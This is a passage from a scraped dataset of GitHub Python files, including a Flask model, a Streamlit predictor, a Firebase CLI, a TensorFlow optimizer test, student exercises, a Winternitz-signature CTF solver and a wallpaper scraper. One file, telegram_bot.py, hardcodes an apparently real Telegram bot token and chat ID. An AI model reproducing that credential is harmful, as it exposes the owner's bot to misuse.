'12',\n \"lucky_numbers\": [57, 44, 80]\n },\n {\n \"id\": self._generateId(),\n \"first_name\": \"Yarit\",\n \"last_name\": last_name,\n \"age\": '30',\n \"lucky_numbers\": [68, 21, 99]\n }\n ]\n\n def _generateId(self): \n\n return randint(0, 7)\n\n #Obtener miembro de la familia con id\n def get_member(self,id):\n\n for member in self._members:\n\n if member['id'] == int(id):\n return member\n\n return None\n\n def get_all_members(self):\n return self._members\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n email = db.Column(db.String(120), unique=True, nullable=False)\n password = db.Column(db.String(80), unique=False, nullable=False)\n is_active = db.Column(db.Boolean(), unique=False, nullable=False)\n\n def __repr__(self):\n return '' % self.username\n\n def serialize(self):\n return {\n \"id\": self.id,\n \"email\": self.email,\n # do not serialize the password, its a security breach\n }","repo_name":"Shar1799/Family-Tree-Static-API","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10907482616","text":"from tensorflow import keras\nimport streamlit as st\nimport joblib\nimport numpy as np\nimport pandas as pd\n\n@st.cache_resource()\ndef load_model(model_path):\n try:\n model = keras.models.load_model(model_path)\n return model\n except Exception as e:\n print(f\"Error: {e}\")\n return None\n\ndef get_result(fail_val, success_val):\n if fail_val < success_val: return \"Can be Successful\"\n return \"No Guarantee of being Successful\"\n\n# UI\nst.title(\"Kickstarter Campaign success Predictor\")\n\nwith st.spinner(\"Loading Model...\"):\n model = load_model(\"./kickstarter_predictions.h5\")\n\nst.write(\"\"\"\n## Input your parameters and get the predicted result\n\"\"\")\n\nbackers = st.number_input(\"Backers\", step=1, value=0, min_value=0)\nlaunch_date = st.date_input(\"Campaign launch date\")\ndeadline = st.date_input(\"Campaign deadline\")\n\ngoal = st.number_input(\"Goal\")\npledged = st.number_input(\"Amount Pledged\")\n\n\ndef calculate_params(backers, launch_date, deadline, goal, pledged):\n scaler = joblib.load(\"scaler.gz\")\n print(scaler.get_params())\n pct = pledged / goal\n diff = deadline - launch_date\n data = pd.DataFrame([[backers, diff.days, pct]], columns=['Backers', 'Days', 'Percentage'])\n data[['Days', 'Backers']] = scaler.transform(data[['Days', 'Backers']])\n with st.spinner(\"Predicting...\"):\n pred = model.predict(data)\n print(pred)\n st.write(\"Prediction Result: \" + get_result(pred[0][0], pred[0][1]))\n \n\nst.button(\"Predict Result\", on_click=calculate_params, args=(backers, launch_date, deadline, goal,pledged)) ","repo_name":"abhirambsn/kickstarter_predictions","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24907918483","text":"import requests\n\ndef send_msg(text):\n\ttoken = \"1171072467:AAHqz6QI90f1KjLRybL8uwYRZblIzAYSSnQ\"\n\tchat_id = \"573611170\"\n\n\turl_req = \"https://api.telegram.org/bot\" + token + \"/sendMessage\" + \"?chat_id=\" + chat_id + \"&text=\" + text\n\tresults = requests.get(url_req)\n\treturn results\n\nsend_msg(\"\")","repo_name":"Shyam-V/car-theft-control","sub_path":"basic/Face_recognition_sample/telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29990468957","text":"# Rendering\nfrom jinja2 import Environment, FileSystemLoader\nimport pathlib\n\nenv = Environment(\n loader=FileSystemLoader(pathlib.Path(__file__).parent.absolute().__str__() + '/templates'),\n autoescape=False,\n trim_blocks=True,\n lstrip_blocks=True,\n)\n\nhpptemplate = env.get_template('hpp.jinja')\ncpptemplate = env.get_template('cpp.jinja')\n\n\ndef renderStructs(ast):\n genStringTrees(ast)\n return (hpptemplate.render(structs=ast['structs'], config=ast['config']),\n cpptemplate.render(structs=ast['structs'], config=ast['config'], filename=ast['filename']))\n\n\ndef genStringTrees(ast):\n for struct in ast['structs'].values():\n struct['split'] = stringTree(struct['expose'])\n\n\nclass Bucket:\n def __init__(self, mode, index):\n self.mode = mode\n self.index = index\n self.buckets = {}\n\n def insert(self, key, value):\n if key not in self.buckets:\n self.buckets[key] = []\n self.buckets[key].append(value)\n\n def singleton(self):\n return len(self.buckets) < 2\n\n def mbsize(self):\n return max([len(sbucket) for sbucket in self.buckets.values()])\n\n\ndef stringTree(fields, key=None):\n if len(fields) == 0:\n return {'mode': 'empty'}\n if len(fields) == 1:\n return {'mode': 'singleton', 'key': key, 'value': fields[0]}\n\n splits = []\n letterSplits(fields, splits)\n lengthSplits(fields, splits)\n\n minSplit = min(splits, key=lambda bucket: bucket.mbsize())\n\n return {\n 'mode': minSplit.mode,\n 'index': minSplit.index,\n 'key': key,\n 'buckets': [stringTree(bucket, key) for key, bucket in minSplit.buckets.items()],\n }\n\n\ndef letterSplits(fields, splits):\n length = min([len(value.name) for value in fields])\n for i in range(length):\n bucket = Bucket('letter', i)\n for field in fields:\n bucket.insert(\"'\" + field.name[i] + \"'\", field)\n if not bucket.singleton():\n splits.append(bucket)\n\n\ndef lengthSplits(fields, splits):\n bucket = Bucket('length', 0)\n for field in fields:\n bucket.insert(len(field.name), field)\n if not bucket.singleton():\n splits.append(bucket)\n","repo_name":"dibidabidab/lua-serde","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33234113994","text":"def main():\r\n \r\n import firebase_admin\r\n from firebase_admin import credentials\r\n from firebase_admin import db\r\n from firebase_admin import auth\r\n\r\n cred = credentials.Certificate(\"library-project-firebase-adminsdk.json\")\r\n libApp = firebase_admin.initialize_app(cred, {\r\n\t 'databaseURL':'https://library-project-9b912-default-rtdb.firebaseio.com/'\r\n\t })\r\n\r\n ref = db.reference(\"/Books\")\r\n\r\n #bundle connection info for easier transport\r\n\r\n #Initialize Function Dictionary\r\n functions = {\"search\": search,\r\n \"remove\": remove,\r\n \"add\": add,\r\n \"changeBook\": changeBook,\r\n \"Help\": getHelp}\r\n\r\n print(\"Welcome to the Library Database!\")\r\n print(\"To get help, type, \\\"Help\\\" \")\r\n while True:\r\n inp = input(':')\r\n (functions[inp])(ref)\r\n\r\n library.close()\r\n\r\ndef getHelp(ref):\r\n print(\"commands: search, remove, add, changeBook\")\r\n\r\ndef getBookInfo():\r\n while True:\r\n print(\"input data type followed by the data and then a comma: ex. Title Harry Potter, Author J.K. Rowling\")\r\n \r\n #gets the input and parses into list according to commas\r\n bookInfo = input(\"input: \").split(\", \")\r\n #Then splits each elements string further on their first space.\r\n bookInfo = [i.split(\" \", 1) for i in bookInfo]\r\n #Flattens list and returns it!\r\n bookInfo = [item for sublist in bookInfo for item in sublist]\r\n\r\n if len(bookInfo) < 2:\r\n print(\"Not enough arguments\")\r\n continue\r\n #check if there are an even number of args\r\n if len(bookInfo) % 2 != 0:\r\n print(\"Odd number of arguments: missing an entry\")\r\n continue\r\n print(bookInfo)\r\n return bookInfo\r\n \r\n \r\ndef search(ref):\r\n searchInfo = getBookInfo()\r\n\r\n print(\"Attempting to search...\")\r\n\r\n #break search info into tuples\r\n searchInfo = list(zip(searchInfo[0::2], searchInfo[1::2]))\r\n\r\n #execute and retrive results\r\n books = ref.get()\r\n\r\n\r\n \r\n for key, value in books.items():\r\n keep = True\r\n for searchItem, searchValue in searchInfo:\r\n try:\r\n if str(searchValue) not in str(value[searchItem]):\r\n keep = False\r\n except: \r\n print(\"error on book\")\r\n print(value)\r\n keep = False\r\n if keep:\r\n print(value)\r\n\r\n\r\n\r\ndef remove(ref):\r\n #Retrive ISBN\r\n isbn = input(\"What is the isbn of the book?: \")\r\n #format\r\n books = ref.get()\r\n for key, value in books.items():\r\n if value['ISBN'] == isbn:\r\n ref.child(key).set({})\r\n break\r\n \r\n\r\ndef add(ref):\r\n #retrive book info\r\n newBook = getBookInfo()\r\n\r\n print(\"Attempting to add...\")\r\n\r\n #slice and store odd elements from the list\r\n values = newBook[1::2]\r\n keys = newBook[0::2]\r\n\r\n newBookDict = dict()\r\n\r\n for i in range(0, len(values)):\r\n newBookDict[keys[i]] = values[i]\r\n\r\n #execute and commit\r\n ref.push().set(newBookDict)\r\n print(\"Success!\")\r\n\r\n\r\n\r\ndef changeBook(ref):\r\n #Retrive Book details\r\n isbn = input(\"What is the ISBN of the book?: \")\r\n info = getBookInfo()\r\n\r\n changes = info[0::2]\r\n keys = info[1::2]\r\n books = ref.get()\r\n\r\n for key, value in books.items():\r\n if value['ISBN'] == isbn:\r\n for i in range(0, len(keys)):\r\n print({ str(keys[i]): changes[i]})\r\n ref.child(key).update({changes[i]:keys[i]})\r\n\r\n print(\"Success!\")\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"EverettButtars/LibraryFirebase","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36895308992","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\nfrom tensorflow.python.eager import context\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import test_util\nfrom tensorflow.python.keras.optimizer_v2 import adadelta\nfrom tensorflow.python.ops import embedding_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import resource_variable_ops\nfrom tensorflow.python.ops import variables\nfrom tensorflow.python.platform import test\n\n\nclass AdadeltaOptimizerTest(test.TestCase):\n\n def doTestBasic(self, use_resource=False, use_callable_params=False):\n num_updates = 4 # number of ADADELTA steps to perform\n for dtype in [dtypes.half, dtypes.float32]:\n for grad in [0.2, 0.1, 0.01]:\n for lr in [1.0, 0.5, 0.1]:\n var0_init = [1.0, 2.0]\n var1_init = [3.0, 4.0]\n if use_resource:\n var0 = resource_variable_ops.ResourceVariable(\n var0_init, dtype=dtype)\n var1 = resource_variable_ops.ResourceVariable(\n var1_init, dtype=dtype)\n else:\n var0 = variables.Variable(var0_init, dtype=dtype)\n var1 = variables.Variable(var1_init, dtype=dtype)\n\n grads = constant_op.constant([grad, grad], dtype=dtype)\n\n accum = 0.0\n accum_update = 0.0\n\n # ADADELTA gradient optimizer\n rho = 0.95\n epsilon = 1e-8\n if use_callable_params:\n adadelta_opt = adadelta.Adadelta(\n learning_rate=lambda: lr, # pylint: disable=cell-var-from-loop\n rho=lambda: rho, # pylint: disable=cell-var-from-loop\n epsilon=epsilon) # pylint: disable=cell-var-from-loop\n else:\n adadelta_opt = adadelta.Adadelta(\n learning_rate=lr, rho=rho, epsilon=epsilon)\n if not context.executing_eagerly():\n adadelta_update = adadelta_opt.apply_gradients(\n zip([grads, grads], [var0, var1]))\n self.evaluate(variables.global_variables_initializer())\n\n # Assign slots\n slot = [None] * 2\n slot_update = [None] * 2\n slot[0] = adadelta_opt.get_slot(var0, \"accum_grad\")\n self.assertEqual(slot[0].shape, var0.shape)\n\n slot_update[0] = adadelta_opt.get_slot(var0, \"accum_var\")\n self.assertEqual(slot_update[0].shape, var0.shape)\n\n slot[1] = adadelta_opt.get_slot(var1, \"accum_grad\")\n self.assertEqual(slot[1].shape, var1.shape)\n\n slot_update[1] = adadelta_opt.get_slot(var1, \"accum_var\")\n self.assertEqual(slot_update[1].shape, var1.shape)\n\n # Fetch params to validate initial values\n self.assertAllClose(var0_init, self.evaluate(var0))\n self.assertAllClose(var1_init, self.evaluate(var1))\n\n update = [None] * num_updates\n tot_update = 0\n for step in range(num_updates):\n # Run adadelta update for comparison\n if not context.executing_eagerly():\n self.evaluate(adadelta_update)\n else:\n adadelta_opt.apply_gradients(zip([grads, grads], [var0, var1]))\n\n # Perform initial update without previous accum values\n accum = accum * rho + (grad**2) * (1 - rho)\n update[step] = (\n np.sqrt(accum_update + epsilon) *\n (1. / np.sqrt(accum + epsilon)) * grad)\n accum_update = (\n accum_update * rho + (update[step]**2) * (1.0 - rho))\n tot_update += update[step] * lr\n\n if not context.executing_eagerly():\n # Check that the accumulators have been updated\n # TODO(lxuechen): This is hard to test in eager mode\n for slot_idx in range(2):\n self.assertAllCloseAccordingToType(\n np.array([accum, accum], dtype=dtype.as_numpy_dtype()),\n self.evaluate(slot[slot_idx]),\n rtol=1e-5)\n\n self.assertAllCloseAccordingToType(\n np.array(\n [accum_update, accum_update],\n dtype=dtype.as_numpy_dtype()),\n self.evaluate(slot_update[slot_idx]),\n rtol=1e-5)\n\n # Check that the parameters have been updated\n self.assertAllCloseAccordingToType(\n np.array(\n [var0_init[0] - tot_update, var0_init[1] - tot_update],\n dtype=dtype.as_numpy_dtype()),\n self.evaluate(var0),\n rtol=1e-5)\n\n self.assertAllCloseAccordingToType(\n np.array(\n [var1_init[0] - tot_update, var1_init[1] - tot_update],\n dtype=dtype.as_numpy_dtype()),\n self.evaluate(var1),\n rtol=1e-5)\n\n @test_util.run_in_graph_and_eager_modes(reset_test=True)\n def testResourceBasic(self):\n self.doTestBasic(use_resource=True)\n\n def testBasicCallableParams(self):\n with context.eager_mode():\n self.doTestBasic(use_resource=True, use_callable_params=True)\n\n @test_util.run_deprecated_v1\n def testMinimizeSparseResourceVariable(self):\n for dtype in [dtypes.half, dtypes.float32, dtypes.float64]:\n with self.cached_session():\n var0 = resource_variable_ops.ResourceVariable([[1.0, 2.0]], dtype=dtype)\n x = constant_op.constant([[4.0], [5.0]], dtype=dtype)\n\n def loss():\n pred = math_ops.matmul(embedding_ops.embedding_lookup([var0], [0]), x) # pylint: disable=cell-var-from-loop\n return pred * pred\n\n sgd_op = adadelta.Adadelta(1.0, 1.0, 1.0).minimize(\n loss, var_list=[var0])\n variables.global_variables_initializer().run()\n # Fetch params to validate initial values\n self.assertAllCloseAccordingToType([[1.0, 2.0]], self.evaluate(var0))\n # Run 1 step of sgd\n sgd_op.run()\n # Validate updated params\n self.assertAllCloseAccordingToType([[-111, -138]], self.evaluate(var0))\n\n def testConstructAdadeltaWithLR(self):\n opt = adadelta.Adadelta(lr=1.0, rho=0.9, epsilon=1.)\n opt_2 = adadelta.Adadelta(learning_rate=0.1, rho=0.9, epsilon=1., lr=1.0)\n opt_3 = adadelta.Adadelta(learning_rate=0.1, rho=0.9, epsilon=1.)\n self.assertIsInstance(opt.lr, variables.Variable)\n self.assertIsInstance(opt_2.lr, variables.Variable)\n self.assertIsInstance(opt_3.lr, variables.Variable)\n\n self.evaluate(variables.global_variables_initializer())\n self.assertAllClose(self.evaluate(opt.lr), (1.0))\n self.assertAllClose(self.evaluate(opt_2.lr), (1.0))\n self.assertAllClose(self.evaluate(opt_3.lr), (0.1))\n\n def testConstructAdadeltaWithEpsilonValues(self):\n opt = adadelta.Adadelta(epsilon=None)\n self.assertEqual(opt.epsilon, 1e-7)\n\n opt = adadelta.Adadelta(epsilon=1e-8)\n self.assertEqual(opt.epsilon, 1e-8)\n\n\nif __name__ == \"__main__\":\n test.main()\n","repo_name":"DeepRec-AI/DeepRec","sub_path":"tensorflow/python/keras/optimizer_v2/adadelta_test.py","file_name":"adadelta_test.py","file_ext":"py","file_size_in_byte":7154,"program_lang":"python","lang":"en","doc_type":"code","stars":895,"dataset":"github-code","pt":"31"} +{"seq_id":"34452490314","text":"# Exercise 8a\n\n# Going back to the E-less book, write a function that takes a list of words\n# and returns only those words that contain no E's.\n# An outline of the function has been supplied for you.\n\nimport re\ndef remove_e_words(wordlist):\n non_e_words = list()\n for word in wordlist:\n if re.search(r'^[^eE]+$', word): # replace the ellipsis with your code\n non_e_words.append(word)\n return non_e_words\n\nassert remove_e_words(['Acorn','Bread','Cornflakes','Dairy','Elephant ears']) \\\n == ['Acorn', 'Dairy']\n# will print nothing if successful\n\n# Discuss: does it make sense to use re.match or re.search in this instance?\n","repo_name":"michelleful/RegexTutorial","sub_path":"exercises/ex8a.py","file_name":"ex8a.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"5230920870","text":"import pandas as pd\nfrom pandas import DataFrame\n\nfrom src.cluster_analysis import ClusterAnalysis\nfrom src.cluster_analysis_use_scholarly_output import ClusterAnalysisUseScholarlyOutput\nfrom src.cluster_analysis_use_share import ClusterAnalysisUseShare\nfrom src.counter import Counter\n\n\ndef main():\n df: DataFrame = pd.read_excel(\"data/Германия.xlsx\")\n fwci: float = 1\n # Для того, чтобы использовать долю используйте класс ClusterAnalysisUseShare\n # Для того, чтобы использовать количество публикаций используйте класс ClusterAnalysisScholarlyOutput\n\n cl = ClusterAnalysisUseShare(df, fwci, 0.0005)\n avr_fwci = cl.get_average_fwci()\n proportion_list = cl.get_proportion()\n\n counter_d: Counter = cl.get_d(fwci, proportion_list)\n counter_e: Counter = cl.get_e(fwci, proportion_list)\n counter_g: Counter = cl.get_g(fwci, proportion_list)\n counter_f: Counter = cl.get_f(fwci, proportion_list)\n print(f\"A find\\n{counter_d}\")\n print(f\"B find\\n{counter_e}\")\n print(f\"C find\\n{counter_g}\")\n print(f\"D find\\n{counter_f}\")\n\n\n","repo_name":"nerudxlf/scival-cluster-analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27620202441","text":"\r\nfrom typing import List, Dict\r\n\r\ndef valeur_decomposition(decomp: Dict[int, int]) -> int:\r\n \"\"\"Retourne la valeur du dictionnaire de domposition de facteurs\"\"\"\r\n res: int = 1\r\n e: int\r\n for e in decomp:\r\n res = res*e**decomp[e]\r\n return res\r\n\r\nassert valeur_decomposition({2:1, 3:1, 5:1}) == 30\r\nassert valeur_decomposition({2:3, 7:1}) == 56\r\nassert valeur_decomposition({2:10}) == 1024\r\n\r\ndef decomposition(l: List[int]) -> Dict[int, int]:\r\n \"\"\"Retourne le dicitionnaire qui décompose le produit de facteurs\"\"\"\r\n res: Dict[int, int] = dict()\r\n e: int\r\n for e in l:\r\n if not e in res:\r\n res[e] = 0\r\n res[e] = res[e]+1\r\n return res\r\n\r\nassert decomposition([2, 3, 5]) == {2: 1, 3: 1, 5: 1}\r\nassert decomposition([2, 2, 2, 7]) == {2: 3, 7: 1}\r\nassert decomposition([2, 2, 2, 2, 2, 2, 2, 2, 2, 2]) == {2: 10}\r\n\r\ndef liste_nombres_premiers(n: int) -> List[int]:\r\n \"\"\"Préconditions n >= 2\r\n Retourne la liste des nombres premiers jusqu'à n\"\"\"\r\n return [i for i in range(2, n+1)]\r\n\r\nprint(liste_nombres_premiers(10))\r\nassert liste_nombres_premiers(10) == [2, 3, 5, 7]\r\nassert liste_nombres_premiers(30) == [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]\r\nassert liste_nombres_premiers(2) == [2]\r\n\r\n\r\ndef liste_facteurs_premiers(n: int) -> List[int]:\r\n \"\"\"Préconditions n >= 2\r\n Renvoie la liste correspondant à la décomposition en facteur premier de n\"\"\"\r\n nb_premiers: List[int] = liste_nombres_premiers(n)\r\n res: List[int] = []\r\n n_copy: int = n\r\n i: int\r\n for i in nb_premiers:\r\n while n_copy%i == 0 and n_copy != 1:\r\n res.append(i)\r\n n_copy = n_copy//i\r\n return res\r\n \r\nassert liste_facteurs_premiers(30) == [2, 3, 5]\r\nassert liste_facteurs_premiers(56) == [2, 2, 2, 7]\r\nassert liste_facteurs_premiers(1024) == [2, 2, 2, 2, 2, 2, 2, 2, 2, 2]\r\nassert liste_facteurs_premiers(13) == [13]\r\n\r\ndef decomposition_facteurs_premiers(n: int) -> Dict[int, int]:\r\n \"\"\"Préconditions n >= 2\r\n Retourne le dictionanaire correspondant à la décomposition en produit de facteur de premiers de n\"\"\"\r\n return decomposition(liste_facteurs_premiers(n))\r\n\r\nassert decomposition_facteurs_premiers(1024) == {2: 10}\r\nassert decomposition_facteurs_premiers(30) == {2: 1, 3: 1, 5: 1}\r\nassert decomposition_facteurs_premiers(56) == {2: 3, 7: 1}\r\nassert decomposition_facteurs_premiers(13) == {13: 1}\r\n","repo_name":"LU1IN001/S1_TME-TD","sub_path":"TP8/Wilhem_Blondel_Axel_Danappe-Laclef_Ex9-7.py","file_name":"Wilhem_Blondel_Axel_Danappe-Laclef_Ex9-7.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37618337953","text":"from asciimatics.screen import Screen\nfrom frame import Frame # object representing a frame\nfrom animations import * # animation functions\nfrom time import time, sleep\n\n\n\ndef run_animation(screen, anim, post_delay: int = 0):\n fr = Frame(screen)\n for changes in anim:\n prev_frame_time = time()\n for anim in changes:\n fr = anim(fr)\n key = screen.get_key()\n if key == ord('n'):\n fr.clear()\n return \"next\"\n if key == ord('p'):\n return \"previous\"\n if key == ord('r'):\n return \"restart\"\n if key == ord('q'):\n exit(0)\n fr.show(screen)\n while time() - prev_frame_time < 0.01:\n pass\n sleep(post_delay/100)\n return \"finished\"\n\n\ndef run_presentation(screen, presentation: list):\n \"\"\"Run the given presentation in the given screen.\n A presentation is simply a list of animations, each of for a slide.\"\"\"\n fr = Frame(screen)\n slide_idx = 0\n while slide_idx < len(presentation):\n ##### Here, play the animation #####\n for slide_modification in presentation[slide_idx]:\n prev_frame_time = time()\n for modif in slide_modification:\n fr = modif(fr)\n key = screen.get_key()\n if key == ord('n'): # next\n slide_idx += 1\n break\n if key == ord('p'): # previous\n print(\"\\a\")\n slide_idx -= 1\n break\n if key == ord('r'): # restart\n continue\n if key == ord('q'): # quit\n exit(0)\n fr.show()\n while time() - prev_frame_time < 0.01:\n pass\n # a pause\n # key = screen.get_key()\n while key == screen.get_key():\n if key == ord('n'): # next\n slide_idx += 1\n continue\n elif key == ord('p'): # previous\n print('\\a')\n slide_idx -= 1\n continue\n elif key == ord('r'): # restart\n continue\n elif key == ord('q'): # quit\n exit(0)\n fr.clear()\n slide_idx += 1\n\n\ndef presentation(screen):\n a = PrimitiveAnimations(screen)\n present= [\n\n a.one_by_one(\n a.title(\"slide 1\"),\n a.appear(4, \"this library is usefull for making presentations\"),\n a.appear(6, \"more precisely, text-based presentations\"),\n a.appear(8, \"Here is a little demonstration of what it can do\"),\n # pauses=True\n ),\n\n a.one_by_one(\n a.title(\"slide 2\"),\n a.appear(2, \"you\"),\n a.appear(3, \"can\"),\n a.appear(4, \"make\"),\n a.appear(5, \"things\"),\n a.appear(6, \"appear\"),\n ),\n\n a.one_by_one(\n a.title(\"slide 3\"),\n a.appear(2, \"these\"),\n a.appear(3, \"ones\"),\n a.appear(4, \"are\"),\n a.appear(5, \"slower\"),\n delay=20,\n ),\n\n a.concat(\n a.title(\"slide 3\"),\n a.appear(2, \"animations are very powerful\"),\n a.after(100, a.appear_left(4, \"-> here it comes\", delay=3)),\n a.bulleted(6, 5, \"and\"),\n a.bulleted(7, 5, \"we\"),\n a.bulleted(8, 5, \"have\"),\n a.bulleted(9, 5, \"bullet\"),\n a.bulleted(10, 5, \"lists\"),\n ),\n\n ]\n run_presentation(screen, present)\n # for a in present:\n # run_animation(screen, a, 100)\n # run_animation(screen, present[0], 100)\n\n\nScreen.wrapper(presentation)\n\n","repo_name":"OsKaR31415/presentation","sub_path":"present.py","file_name":"present.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3123461892","text":"class Solution(object): \n def canIWin(self, maxChoosableInteger, desiredTotal):\n \"\"\"\n :type maxChoosableInteger: int\n :type desiredTotal: int\n :rtype: bool\n \"\"\"\n def win(M, T, m, state):\n #The other player already win, so T is smaller or equal to 0\n if T <= 0: \n return False\n #The repeated situation, check the result at m\n if m[state] != 0:\n return m[state] == 1\n for i in range(M):\n #number i used\n if (state & (1 << i)) > 0:\n continue\n #The other player can't win, so you win\n if not win(M, T-i-1, m, state | (1 << i)):\n m[state] = 1\n return True\n #At the end, you can't win\n m[state] = -1\n return False\n \n #The sum of all numbers < target value, no one can win\n if (maxChoosableInteger * (maxChoosableInteger + 1)) / 2 < desiredTotal:\n return False\n #This player win\n if desiredTotal <= 0:\n return True\n if (maxChoosableInteger * (maxChoosableInteger + 1)) / 2 == desiredTotal:\n return maxChoosableInteger % 2 == 1\n m = [0] * (1 << maxChoosableInteger) #0 for unknown, 1 for win, -1 for lose\n return win(maxChoosableInteger, desiredTotal, m, 0)\n","repo_name":"tr1503/LeetCode","sub_path":"MinMax/canIWin.py","file_name":"canIWin.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4030137067","text":"size_font = 70\nsize_xo = 80\n\nbg_color = '#D0CFE1' # white\ngeometry = '600x600'\n\ninstr_text = 'X - you O - bot'\n\nframe1_color = '#9765E1' # purple\n\nframe2_color = '#C1A8E1' # soft purple\n\ndraw = 'Draw'\nplayer_win = 'You win!' \nbot_win = 'Bot win...'","repo_name":"FelixKerser/tic-tac-toe-AI","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4932618620","text":"#!/usr/bin/python3\n\nfrom pwn import *\nimport winternitz.signatures\nfrom binascii import unhexlify\n\nHOST = \"winterfactory-0.chals.kitctf.de\"\nPORT = 1337\n\nLOCAL = not args.REMOTE\n\nfactory_id = 831347528\ninit_message = bytes(\"surely no secret here\"+str(factory_id), \"utf-8\")\nw = 2**16\n\nlocal_wots = winternitz.signatures.WOTS(w, digestsize=256, hashfunction=winternitz.signatures.openssl_sha256)\n\ninit_msghash = winternitz.signatures.openssl_sha256(init_message)\ninit_bytestosign = local_wots._getSignatureBaseMessage(init_msghash)\n\nlowest_ck = init_bytestosign[16]\n\n\n#context.log_level = \"DEBUG\"\n\nif LOCAL:\n p = process([\"python3\", \"winterfactory.py\"])\nelse:\n p = remote(HOST, PORT, ssl=True)\n\n\ndef can_sign(mb):\n for i in range(16):\n if mb[i] < init_bytestosign[i]:\n return False\n if mb[17] < init_bytestosign[i]:\n return False\n \"\"\"\n if mb[16] < lowest_ck:\n return False\n \"\"\"\n return True\n\ndef signature(mb):\n certif = [None for _ in range(18)]\n for i in range(16):\n certif[i] = local_wots._chain(init_certificate[i], init_bytestosign[i], mb[i])\n certif[17] = local_wots._chain(init_certificate[17], init_bytestosign[17], mb[17])\n certif[16] = local_wots._chain(lowest_ck_sign, lowest_ck, mb[16])\n return \"|\".join([b.hex() for b in certif]).encode()\n\np.recvline()\np.recvline()\ninit_certificate = list(map(unhexlify, p.recvline(keepends=False).decode().split(\"|\")))\nlowest_ck_sign = init_certificate[16]\np.recvline()\np.recvline()\n\nwhile True:\n p.recvline()\n p.recvline()\n p.recvuntil(b\"| \")\n p11 = unhexlify(p.recvuntil(b\" |\", drop=True).decode())\n p.recvline()\n p.recvline()\n p.recvuntil(b\"| \")\n p21 = unhexlify(p.recvuntil(b\" |\", drop=True).decode())\n p.recvuntil(b\">> \")\n p11_hash = winternitz.signatures.openssl_sha256(p11)\n p21_hash = winternitz.signatures.openssl_sha256(p21)\n p11_bytes = local_wots._getSignatureBaseMessage(p11_hash)\n p21_bytes = local_wots._getSignatureBaseMessage(p21_hash)\n if (can_sign(p11_bytes) and p11_bytes[16] >= p21_bytes[16]) or (can_sign(p21_bytes) and p21_bytes[16] >= p11_bytes[16]):\n p.sendline(b\"yes\")\n p.recvuntil(b\">> \")\n if p11_bytes[16] >= p21_bytes[16]:\n p.sendline(b\"2\")\n p.recvline()\n ck_sign = unhexlify(p.recvline(keepends=False).decode())\n lowest_ck = p21_bytes[16]\n lowest_ck_sign = ck_sign\n p.recvuntil(b\">> \")\n p.sendline(signature(p11_bytes))\n else:\n p.sendline(b\"1\")\n p.recvline()\n ck_sign = unhexlify(p.recvline(keepends=False).decode())\n lowest_ck = p11_bytes[16]\n lowest_ck_sign = ck_sign\n p.recvuntil(b\">> \")\n p.sendline(signature(p21_bytes))\n print(p.recvline(keepends=False))\n exit()\n else:\n p.sendline(b\"no\")\n\n","repo_name":"MathVerg/WriteUp","sub_path":"GPN2023/winterfactory/attack.py","file_name":"attack.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"73695930969","text":"import requests\nfrom bs4 import BeautifulSoup\nimport os\n\ntitle= '王者'\nos.mkdir(title)\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'}\nfor i in range(2, 50):\n list_url = 'http://www.netbian.com/s/wangzherongyao/index_'+str(i)+'.htm'\n list_source = requests.get(list_url, headers=headers).text\n list_soup = BeautifulSoup(list_source, 'lxml')\n page_urls = list_soup.find('div', {'class': 'list'}).find_all('li')\n for j in page_urls:\n second_url = 'http://www.netbian.com'+j.find('a')['href']\n try:\n second_source = requests.get(second_url, headers=headers).text\n except:\n print(' ')\n second_soup = BeautifulSoup(second_source, 'lxml')\n second_page_urls = second_soup.find('div', {'class': 'pic'}).find_all('p')\n for each in second_page_urls:\n third_url = 'http://www.netbian.com'+each.find('a')['href']\n # print(third_url)\n third_request = requests.get(third_url,headers = headers)\n third_pagesource = third_request.text\n third_soup = BeautifulSoup(third_pagesource,'lxml')\n img_name = third_soup.find('title').text\n # print(img_name)\n try:\n img_source = third_soup.find('table', {'id': 'endimg'}).find_all('img')#找到图片标签\n except:\n print(' ')\n 